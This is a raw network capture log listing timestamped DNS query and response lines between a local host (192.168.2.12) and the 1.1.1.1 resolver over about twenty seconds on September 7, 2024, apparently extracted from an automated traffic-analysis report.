                                                                                                                                                                    Sep 7, 2024 15:36:38.920523882 CEST53613371.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:38.978163958 CEST6404453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:38.988799095 CEST53640441.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.042212009 CEST5042753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:39.051574945 CEST53504271.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.118710041 CEST5602053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:39.286689997 CEST53560201.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.337456942 CEST6431253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:39.356345892 CEST53643121.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.431279898 CEST6279753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:39.457520008 CEST53627971.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.525022984 CEST5286153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:39.533349991 CEST53528611.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.587630033 CEST5439953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:39.598504066 CEST53543991.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.650038958 CEST6230153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:39.897924900 CEST53623011.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:39.947942019 CEST6204253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:39.957652092 CEST53620421.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:40.025172949 CEST5592053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:40.259501934 CEST53559201.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:40.321847916 CEST6489453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:40.424278021 CEST53648941.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:40.478110075 CEST5167353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:40.513284922 CEST53516731.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:40.572081089 CEST5725053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:40.599173069 CEST53572501.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:40.665971994 CEST5174853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:40.676441908 CEST53517481.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:40.696871042 CEST5146953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:40.705941916 CEST53514691.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:41.213026047 CEST5831853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:41.234343052 CEST53583181.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:41.290570974 CEST5516553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:41.311419964 CEST53551651.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:41.369393110 CEST6006553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:41.619863033 CEST6006553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:41.644117117 CEST53600651.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:41.644145966 CEST53600651.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:41.697561979 CEST6525553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:41.947195053 CEST6525553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:41.968799114 CEST53652551.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:41.968803883 CEST53652551.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:42.025755882 CEST5670653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:42.103765011 CEST53567061.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:42.149960041 CEST5177653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:42.166944027 CEST53517761.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:42.212745905 CEST6445053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:42.354149103 CEST53644501.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:42.415962934 CEST6030653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:42.579560041 CEST53603061.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:42.637533903 CEST4919953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:42.672624111 CEST53491991.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:42.728329897 CEST6344853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:42.738473892 CEST53634481.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:42.806308985 CEST4958053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:42.835088968 CEST53495801.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:42.884366989 CEST6394353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:42.892791033 CEST53639431.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:42.946794987 CEST5544053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:42.963655949 CEST53554401.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.010118008 CEST4950153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:43.019648075 CEST53495011.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.071866989 CEST5480253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:43.081058025 CEST53548021.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.134413958 CEST5316353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:43.311238050 CEST53531631.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.368957043 CEST5527253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:43.388662100 CEST53552721.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.448625088 CEST6004053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:43.457511902 CEST53600401.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.515604973 CEST6199253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:43.681430101 CEST53619921.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.728420973 CEST5797753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:43.754807949 CEST53579771.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.806271076 CEST5590853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:43.815834999 CEST53559081.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.821965933 CEST5301153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:43.830467939 CEST53530111.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:43.884999037 CEST5424153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:43.966475010 CEST53542411.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:44.111435890 CEST5662453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:44.286416054 CEST53566241.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:44.339992046 CEST5949853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:44.587888002 CEST5949853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:44.632678032 CEST53594981.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:44.632689953 CEST53594981.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:44.683970928 CEST5209353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:44.770136118 CEST53520931.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:44.822410107 CEST5658853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:44.842575073 CEST53565881.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:44.900057077 CEST5447953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:44.932549000 CEST53544791.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:44.978741884 CEST5194153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:44.988035917 CEST53519411.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.043967962 CEST6312753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:45.056123972 CEST53631271.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.103207111 CEST6077253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:45.112858057 CEST53607721.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.165637016 CEST5922953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:45.175962925 CEST53592291.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.228276014 CEST4958753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:45.250504017 CEST53495871.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.306309938 CEST6042453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:45.318559885 CEST53604241.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.368720055 CEST5838853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:45.624454975 CEST53583881.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.666641951 CEST5422953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:45.676733971 CEST53542291.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.728068113 CEST6379853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:45.738321066 CEST53637981.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.822128057 CEST5135353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:45.839044094 CEST53513531.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:45.885593891 CEST5890653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:46.051078081 CEST53589061.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:46.106812000 CEST5142053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:46.117590904 CEST53514201.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:46.165600061 CEST6460253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:46.385432959 CEST53646021.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:46.475222111 CEST5370053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:46.644777060 CEST53537001.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:46.697264910 CEST5671953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:46.732108116 CEST53567191.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:46.790602922 CEST6477853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:47.038081884 CEST53647781.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:47.106484890 CEST5365853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:47.115561008 CEST53536581.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:47.166260958 CEST5845753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:47.178563118 CEST53584571.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:47.228322029 CEST4917753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:47.327589035 CEST53491771.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:47.368774891 CEST6041453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:47.378341913 CEST53604141.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:47.432341099 CEST6017553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:47.528069019 CEST53601751.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:47.574759960 CEST6270553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:47.740494967 CEST53627051.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:47.790610075 CEST5101753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:47.799731016 CEST53510171.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:47.853210926 CEST5092753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:48.048852921 CEST53509271.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:48.103555918 CEST6240753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:48.333005905 CEST53624071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:48.384926081 CEST5564753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:48.395056963 CEST53556471.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:48.462909937 CEST5903653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:48.712662935 CEST5903653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:49.290663004 CEST53590361.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:49.290697098 CEST53590361.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:49.337742090 CEST5469053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:49.532032013 CEST53546901.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:49.589339018 CEST5289653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:49.598279953 CEST53528961.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:49.605547905 CEST5970753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:49.614816904 CEST53597071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:49.665976048 CEST4945853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:49.677747011 CEST53494581.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:49.728148937 CEST6147253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:49.738071918 CEST53614721.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:49.792776108 CEST5778753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:49.970511913 CEST53577871.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:50.044279099 CEST6340453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:50.220536947 CEST53634041.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:50.274964094 CEST5030753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:50.542357922 CEST5030753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:50.549165010 CEST53503071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:50.549206972 CEST53503071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:50.633873940 CEST5789553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:50.884954929 CEST5789553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:51.215876102 CEST53578951.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:51.215950012 CEST53578951.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:51.260968924 CEST5844653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:51.495704889 CEST53584461.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:51.541671991 CEST6116553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:51.563637972 CEST53611651.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:51.618793964 CEST5844653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:51.625674963 CEST53584461.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.165587902 CEST5092553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:52.415591002 CEST5092553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:52.430167913 CEST53509251.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.432713985 CEST53509251.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.479731083 CEST6444153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:52.513401031 CEST53644411.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.571877956 CEST5236053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:52.608139992 CEST53523601.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.650154114 CEST6216653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:52.688075066 CEST53621661.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.743994951 CEST5694553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:52.756608009 CEST53569451.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.806586981 CEST6495853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:52.841988087 CEST53649581.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.885052919 CEST6507653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:52.919059992 CEST53650761.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:52.964303017 CEST5757053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:52.986757994 CEST53575701.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:53.040781021 CEST4964653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:53.064527988 CEST53496461.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:53.118925095 CEST5007053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:53.155705929 CEST53500701.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:53.197199106 CEST5459153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:53.379581928 CEST53545911.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:53.415760040 CEST5798953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:53.427453995 CEST53579891.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:53.478092909 CEST5428953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:53.711764097 CEST53542891.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:53.759960890 CEST6513353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:54.013669968 CEST53651331.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.056865931 CEST5662253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:54.065360069 CEST53566221.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.103132010 CEST6097753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:54.122951031 CEST53609771.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.136960030 CEST4975253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:54.145896912 CEST53497521.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.197021961 CEST5830153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:54.206350088 CEST53583011.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.259320974 CEST6316853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:54.278821945 CEST53631681.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.321819067 CEST6365053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:54.352711916 CEST53636501.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.401407003 CEST5402153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:54.410713911 CEST53540211.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.462543011 CEST6242253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:54.646912098 CEST53624221.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.697382927 CEST5541453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:54.707411051 CEST53554141.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:54.759438038 CEST6427353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:55.024699926 CEST6427353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:55.037262917 CEST53642731.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:55.037287951 CEST53642731.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:55.088054895 CEST6484253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:55.134536982 CEST53648421.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:55.181746960 CEST5807853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:55.212436914 CEST53580781.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:55.260210037 CEST6456653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:55.268811941 CEST53645661.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:55.306551933 CEST5271053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:55.526349068 CEST53527101.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:55.571897030 CEST5682853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:55.591114998 CEST53568281.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:55.649955988 CEST5282253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:55.899696112 CEST5282253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:55.937875032 CEST53528221.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:55.937889099 CEST53528221.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:55.979248047 CEST5834953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:56.082343102 CEST53583491.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:56.118912935 CEST5084653192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:56.164833069 CEST53508461.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:56.212462902 CEST6544853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:56.463365078 CEST6544853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:56.744792938 CEST53654481.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:56.744816065 CEST53654481.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:56.793770075 CEST4986153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:56.827876091 CEST53498611.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:56.869009972 CEST5819453192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:56.879671097 CEST53581941.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:56.915601015 CEST5060953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:57.155771017 CEST53506091.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:57.196789026 CEST5656853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:57.207696915 CEST53565681.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:57.243668079 CEST5929853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:57.250346899 CEST53592981.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:57.790824890 CEST5767253192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:57.800369978 CEST53576721.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:57.868771076 CEST5457053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:58.030138016 CEST53545701.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:58.071835041 CEST6328153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:58.081370115 CEST53632811.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:58.134629011 CEST6210753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:58.163336992 CEST53621071.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:58.197057962 CEST5303553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:58.366224051 CEST53530351.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:58.400111914 CEST5265353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:58.649780035 CEST5265353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:58.734278917 CEST53526531.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:58.734297991 CEST53526531.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:58.776504993 CEST5482753192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:58.790069103 CEST53548271.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:58.837578058 CEST5949353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:58.934765100 CEST53594931.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:58.979116917 CEST5614353192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:59.076661110 CEST53561431.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.123888016 CEST6281853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:59.150670052 CEST53628181.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.165611029 CEST5479953192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:59.174916983 CEST53547991.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.212476015 CEST6436853192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:59.222800016 CEST53643681.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.259318113 CEST6368053192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:59.268378019 CEST53636801.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.306313038 CEST6161153192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:59.316040993 CEST53616111.1.1.1192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:36:59.353167057 CEST5437553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:59.602807045 CEST5437553192.168.2.121.1.1.1
                                                                                                                                                                    Sep 7, 2024 15:36:59.691071987 CEST53543751.1.1.1192.168.2.12
